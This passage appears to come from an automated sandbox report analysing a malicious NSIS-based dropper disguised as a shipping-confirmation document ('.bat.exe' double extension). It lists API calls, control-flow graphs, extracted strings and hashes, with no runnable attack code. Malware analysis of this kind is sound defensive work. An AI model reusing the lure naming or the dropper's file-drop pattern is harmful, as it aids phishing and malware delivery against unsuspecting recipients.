                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E68
                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403E73
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\eftermodnendes\ringeagt), ref: 00403EBC
                                                                              • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                                            • RegisterClassW.USER32(00428A00), ref: 00403EF9
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F11
                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F46
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403F7C
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FA8
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FB5
                                                                            • RegisterClassW.USER32(00428A00), ref: 00403FBE
                                                                            • DialogBoxParamW.USER32(?,00000000,00404102,00000000), ref: 00403FDD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\eftermodnendes\ringeagt$Call$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                            • API String ID: 1975747703-849894130
                                                                            • Opcode ID: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                                            • Instruction ID: 33830a549d8bd1c9ff3d4095a28b7d5feb3a0022977f60bfd4e6bbc11b1c7dcb
                                                                            • Opcode Fuzzy Hash: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                                            • Instruction Fuzzy Hash: 4661D570200741BAD620AB669E46F2B3A7CEB84709F41453FFA45B61E2DF795902CB2D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 225 4030d5-403123 GetTickCount GetModuleFileNameW call 406172 228 403125-40312a 225->228 229 40312f-40315d call 406682 call 405f9d call 406682 GetFileSize 225->229 230 40336f-403373 228->230 237 403163 229->237 238 403248-403256 call 403033 229->238 240 403168-40317f 237->240 244 403327-40332c 238->244 245 40325c-40325f 238->245 242 403181 240->242 243 403183-40318c call 4035e7 240->243 242->243 252 403192-403199 243->252 253 4032e3-4032eb call 403033 243->253 244->230 247 403261-403279 call 4035fd call 4035e7 245->247 248 40328b-4032d7 GlobalAlloc call 406bd1 call 4061a1 CreateFileW 245->248 247->244 276 40327f-403285 247->276 274 4032d9-4032de 248->274 275 4032ed-40331d call 4035fd call 403376 248->275 257 403215-403219 252->257 258 40319b-4031af call 40612d 252->258 253->244 263 403223-403229 257->263 264 40321b-403222 call 403033 257->264 258->263 272 4031b1-4031b8 258->272 265 403238-403240 263->265 266 40322b-403235 call 406b63 263->266 264->263 265->240 273 403246 265->273 266->265 272->263 279 4031ba-4031c1 272->279 273->238 274->230 286 403322-403325 275->286 276->244 276->248 279->263 281 4031c3-4031ca 279->281 281->263 283 4031cc-4031d3 281->283 283->263 285 4031d5-4031f5 283->285 285->244 287 4031fb-4031ff 285->287 286->244 288 40332e-40333f 286->288 289 403201-403205 287->289 290 403207-40320f 287->290 291 403341 288->291 292 403347-40334c 288->292 289->273 289->290 290->263 294 403211-403213 290->294 291->292 293 40334d-403353 292->293 293->293 295 403355-40336d call 40612d 293->295 294->263 295->230
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 004030E9
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,00000400), ref: 00403105
                                                                              • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,80000000,00000003), ref: 00406176
                                                                              • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                                            • GetFileSize.KERNEL32(00000000,00000000,Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,80000000,00000003), ref: 0040314E
                                                                            • GlobalAlloc.KERNELBASE(00000040,00008001), ref: 00403290
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004030DF, 004032A8
                                                                            • C:\Users\user\Desktop, xrefs: 00403130, 00403135, 0040313B
                                                                            • soft, xrefs: 004031C3
                                                                            • Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, xrefs: 00403142
                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403327
                                                                            • "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe", xrefs: 004030DE
                                                                            • Null, xrefs: 004031CC
                                                                            • Inst, xrefs: 004031BA
                                                                            • O, xrefs: 00403318
                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D9
                                                                            • Error launching installer, xrefs: 00403125
                                                                            • C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, xrefs: 004030EF, 004030FE, 00403112, 0040312F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                            • String ID: "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"$Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$O
                                                                            • API String ID: 2803837635-576556797
                                                                            • Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                                            • Instruction ID: fa10dec2ede943269712b0c7dd26c00cc534fb31fc6fa5581d899c5550bae655
                                                                            • Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                                            • Instruction Fuzzy Hash: 0171B071E00204ABDB20DFA4ED86B9E7AACAB04316F60457FF515B62D1CB7C9E418B5C

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 298 4066bf-4066c8 299 4066ca-4066d9 298->299 300 4066db-4066f5 298->300 299->300 301 406905-40690b 300->301 302 4066fb-406707 300->302 304 406911-40691e 301->304 305 406719-406726 301->305 302->301 303 40670d-406714 302->303 303->301 307 406920-406925 call 406682 304->307 308 40692a-40692d 304->308 305->304 306 40672c-406735 305->306 310 4068f2 306->310 311 40673b-40677e 306->311 307->308 312 406900-406903 310->312 313 4068f4-4068fe 310->313 314 406784-406790 311->314 315 406896-40689a 311->315 312->301 313->301 316 406792 314->316 317 40679a-40679c 314->317 318 40689c-4068a3 315->318 319 4068ce-4068d2 315->319 316->317 320 4067d6-4067d9 317->320 321 40679e-4067c4 call 406550 317->321 324 4068b3-4068bf call 406682 318->324 325 4068a5-4068b1 call 4065c9 318->325 322 4068e2-4068f0 lstrlenW 319->322 323 4068d4-4068dd call 4066bf 319->323 329 4067db-4067e7 GetSystemDirectoryW 320->329 330 4067ec-4067ef 320->330 338 4067ca-4067d1 call 4066bf 321->338 339 40687e-406881 321->339 322->301 323->322 334 4068c4-4068ca 324->334 325->334 335 406879-40687c 329->335 336 406801-406805 330->336 337 4067f1-4067fd GetWindowsDirectoryW 330->337 334->322 340 4068cc 334->340 335->339 341 40688e-406894 call 406930 335->341 336->335 342 406807-406825 336->342 337->336 338->335 339->341 344 406883-406889 lstrcatW 339->344 340->341 341->322 346 406827-40682d 342->346 347 406839-406851 call 406a76 342->347 344->341 352 406835-406837 346->352 355 406853-406866 SHGetPathFromIDListW CoTaskMemFree 347->355 356 406868-406871 347->356 352->347 353 406873-406877 352->353 353->335 355->353 355->356 356->342 356->353
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067E1
                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004067F7
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406855
                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040685E
                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406889
                                                                            • lstrlenW.KERNEL32(Call,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004068E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)
                                                                            • API String ID: 4024019347-3319343437
                                                                            • Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                                            • Instruction ID: 4a93dbd931fcfc477af1f24740db1e2af50c51fdf4929e220b088375b48f32a9
                                                                            • Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                                            • Instruction Fuzzy Hash: 586147B26053005BEB206F25DD80B6B77E8AB54318F26453FF587B22D0DB3C8961875E

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 421 401774-401799 call 402dab call 405fc8 426 4017a3-4017b5 call 406682 call 405f51 lstrcatW 421->426 427 40179b-4017a1 call 406682 421->427 433 4017ba-4017bb call 406930 426->433 427->433 436 4017c0-4017c4 433->436 437 4017c6-4017d0 call 4069df 436->437 438 4017f7-4017fa 436->438 446 4017e2-4017f4 437->446 447 4017d2-4017e0 CompareFileTime 437->447 440 401802-40181e call 406172 438->440 441 4017fc-4017fd call 40614d 438->441 448 401820-401823 440->448 449 401892-4018bb call 405707 call 403376 440->449 441->440 446->438 447->446 450 401874-40187e call 405707 448->450 451 401825-401863 call 406682 * 2 call 4066bf call 406682 call 405ce2 448->451 463 4018c3-4018cf SetFileTime 449->463 464 4018bd-4018c1 449->464 461 401887-40188d 450->461 451->436 485 401869-40186a 451->485 465 402c38 461->465 467 4018d5-4018e0 CloseHandle 463->467 464->463 464->467 468 402c3a-402c3e 465->468 470 4018e6-4018e9 467->470 471 402c2f-402c32 467->471 473 4018eb-4018fc call 4066bf lstrcatW 470->473 474 4018fe-401901 call 4066bf 470->474 471->465 479 401906-40239d 473->479 474->479 483 4023a2-4023a7 479->483 484 40239d call 405ce2 479->484 483->468 484->483 485->461 486 40186c-40186d 485->486 486->450
                                                                            APIs
                                                                            • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt,?,?,00000031), ref: 004017B5
                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt,?,?,00000031), ref: 004017DA
                                                                              • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                                              • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                              • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                              • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                              • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsx45AB.tmp$C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dll$C:\Users\user\eftermodnendes\ringeagt$Call
                                                                            • API String ID: 1941528284-842788378
                                                                            • Opcode ID: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
                                                                            • Instruction ID: 8b6fd23670850fd9ae356807d0398338211ecbfbdba6d544e24b7f39de498ea1
                                                                            • Opcode Fuzzy Hash: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
                                                                            • Instruction Fuzzy Hash: 7541A331900109FACF11BBB5CD85DAE7A79EF41329B21423FF422B10E1D73D8A91966D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 487 4026f1-40270a call 402d89 490 402710-402717 487->490 491 402c2f-402c32 487->491 492 402719 490->492 493 40271c-40271f 490->493 494 402c38-402c3e 491->494 492->493 496 402883-40288b 493->496 497 402725-402734 call 4065e2 493->497 496->491 497->496 500 40273a 497->500 501 402740-402744 500->501 502 4027d9-4027dc 501->502 503 40274a-402765 ReadFile 501->503 504 4027f4-402804 call 4061f5 502->504 505 4027de-4027e1 502->505 503->496 506 40276b-402770 503->506 504->496 515 402806 504->515 505->504 507 4027e3-4027ee call 406253 505->507 506->496 509 402776-402784 506->509 507->496 507->504 512 40278a-40279c MultiByteToWideChar 509->512 513 40283f-40284b call 4065c9 509->513 512->515 516 40279e-4027a1 512->516 513->494 519 402809-40280c 515->519 520 4027a3-4027ae 516->520 519->513 521 40280e-402813 519->521 520->519 522 4027b0-4027d5 SetFilePointer MultiByteToWideChar 520->522 523 402850-402854 521->523 524 402815-40281a 521->524 522->520 525 4027d7 522->525 526 402871-40287d SetFilePointer 523->526 527 402856-40285a 523->527 524->523 528 40281c-40282f 524->528 525->515 526->496 529 402862-40286f 527->529 530 40285c-402860 527->530 528->496 531 402831-402837 528->531 529->496 530->526 530->529 531->501 532 40283d 531->532 532->496
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 0040275D
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                              • Part of subcall function 00406253: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406269
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                            • String ID: 9
                                                                            • API String ID: 163830602-2366072709
                                                                            • Opcode ID: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                                            • Instruction ID: 4accc3969fe2a7d0a9ccf1f8c11f2542f9fe60139f427c4dffc821b6e73cd172
                                                                            • Opcode Fuzzy Hash: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                                            • Instruction Fuzzy Hash: F3510B75D0011AABDF24AF94CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 533 406a06-406a26 GetSystemDirectoryW 534 406a28 533->534 535 406a2a-406a2c 533->535 534->535 536 406a3d-406a3f 535->536 537 406a2e-406a37 535->537 539 406a40-406a73 wsprintfW LoadLibraryExW 536->539 537->536 538 406a39-406a3b 537->538 538->539
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                                            • wsprintfW.USER32 ref: 00406A58
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A6C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%S.dll$UXTHEME
                                                                            • API String ID: 2200240437-1106614640
                                                                            • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                            • Instruction ID: 2238e0f1a46f5e25e3951852f43a11dddaa5b7c7f32292af2b6637a080077407
                                                                            • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                            • Instruction Fuzzy Hash: DFF0FC30601119A7CB14BB68DD0EFAB375C9B01704F10847AA646F10D0EB789664CF98

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 540 402eae-402ed7 call 4064ef 542 402edc-402ee0 540->542 543 402f91-402f95 542->543 544 402ee6-402eea 542->544 545 402eec-402f0d RegEnumValueW 544->545 546 402f0f-402f22 544->546 545->546 547 402f76-402f84 RegCloseKey 545->547 548 402f4b-402f52 RegEnumKeyW 546->548 547->543 549 402f24-402f26 548->549 550 402f54-402f66 RegCloseKey call 406a76 548->550 549->547 552 402f28-402f3c call 402eae 549->552 556 402f86-402f8c 550->556 557 402f68-402f74 RegDeleteKeyW 550->557 552->550 558 402f3e-402f4a 552->558 556->543 557->543 558->548
                                                                            APIs
                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CloseEnum$DeleteValue
                                                                            • String ID:
                                                                            • API String ID: 1354259210-0
                                                                            • Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                                            • Instruction ID: 09cb529ade84319239dc5b50ebc61ba38ec7146c59f77be9acf979a475766563
                                                                            • Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                                            • Instruction Fuzzy Hash: FD218B7150011ABFDF119F90CE89EEF7B7DEB10388F100076B949B11E0D7B48E54AA68

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
